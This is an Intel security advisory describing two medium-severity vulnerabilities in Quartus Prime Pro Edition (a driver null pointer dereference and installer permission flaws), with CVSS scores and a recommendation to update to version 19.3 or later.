Escalation of Privilege, Denial of Service

Severity rating:

MEDIUM

Original release:

12/10/2019

Last revised:

12/10/2019

**Summary: **

Potential security vulnerabilities in Intel® Quartus® Prime Pro Edition may allow escalation of privilege and/or denial of service. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2019-14604

Description: Null pointer dereference in the FPGA kernel driver for Intel(R) Quartus(R) Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 6.8 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:H

CVEID: CVE-2019-14603  

Description: Improper permissions in the installer for the License Server software for Intel® Quartus® Prime Pro Edition before version 19.3 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® Quartus® Prime Pro before version 19.3.

**Recommendations:**

Intel recommends that users of Intel® Quartus® Prime Pro Edition update to 19.3 or later.

Updates are available for download at this location:

http://fpgasoftware.intel.com/?edition=pro

**Acknowledgements:**

Intel would like to thank Nitin Pundir (CVE-2019-14604) and Marius Gabriel Mihai (CVE-2019-14603).

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

12/10/2019

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

Tag

#firefox